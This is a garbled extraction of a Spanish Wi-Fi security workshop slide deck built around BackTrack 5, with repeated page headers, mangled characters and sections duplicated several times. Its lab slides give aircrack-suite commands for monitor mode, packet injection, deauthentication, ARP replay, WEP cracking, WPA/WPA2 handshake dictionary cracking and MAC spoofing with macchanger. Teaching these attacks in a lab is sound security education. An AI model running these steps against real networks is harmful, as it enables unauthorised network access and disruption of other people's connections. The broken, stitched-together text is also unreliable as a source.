httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 20: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 21: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

